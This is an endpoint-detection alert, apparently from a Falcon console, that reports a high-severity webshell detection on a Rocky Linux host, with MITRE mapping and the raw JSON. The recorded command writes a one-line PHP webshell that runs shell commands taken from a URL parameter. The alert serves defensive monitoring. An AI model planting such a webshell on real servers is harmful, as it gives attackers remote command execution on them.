Alert Information High
Alert ID
ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234313840486972-30122-7632912
Composite ID
84393bf974fd44bda943a25a6a7bc27f:ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234313840486972-30122-7632912
설명
A webshell has been detected on your host. It may provide adversaries a set of functions to execute or a command-line interface on the system. Please check the process tree to determine if malicious commands were executed or if this access was expected.
호스트
localhost.localdomain
상태
new
생성 시간
2025-12-20 21:39:35
업데이트 시간
2025-12-20 22:38:35
MITRE ATT&CK
Tactic
Persistence
Technique
Web Shell
Command Line 
bash -c echo "<?php system(\$_GET[c]);?>" > /tmp/s.php; rm /tmp/s.php
Raw JSON Data 
{"id":"ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234313840486972-30122-7632912","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:b4aeee57c4b841bc95cb853f0aca95e1:1766234313840486972-30122-7632912","agent_id":"b4aeee57c4b841bc95cb853f0aca95e1","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"A webshell has been detected on your host. It may provide adversaries a set of functions to execute or a command-line interface on the system. Please check the process tree to determine if malicious commands were executed or if this access was expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Persistence","tactic_id":"TA0003","technique":"Web Shell","technique_id":"T1505.003","cmdline":"bash -c echo \u0022\u003C?php system(\\$_GET[c]);?\u003E\u0022 \u003E /tmp/s.php; rm /tmp/s.php","filename":"bash","filepath":"/usr/bin/bash","sha256":"ec6d007d48ef11bc47ad3f372b4b20ff2f0d4e63867e7e4cc0f1b17b19fa88b2","status":"new","type":"ldt","created_timestamp":"2025-12-20T12:39:35.618375777Z","updated_timestamp":"2025-12-20T13:38:35.603959341Z","device":{"device_id":"b4aeee57c4b841bc95cb853f0aca95e1","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"localhost.localdomain","local_ip":"10.24.11.62","external_ip":"211.198.135.5","mac_address":"00-0c-29-89-f8-0a","platform_name":"Linux","os_version":"Rocky Linux 9.6"},"aggregate_id":"aggind:b4aeee57c4b841bc95cb853f0aca95e1:4807706886","CreatedAt":"2025-12-20T21:39:35.6183758+09:00","UpdatedAt":"2025-12-20T22:38:35.6039593+09:00"}
Quick Info
  • Severity High
  • Score 70
  • Agent ID b4aeee57c4b841bc95cb853f0aca95e1
Actions
Falcon Console에서 보기 목록으로 돌아가기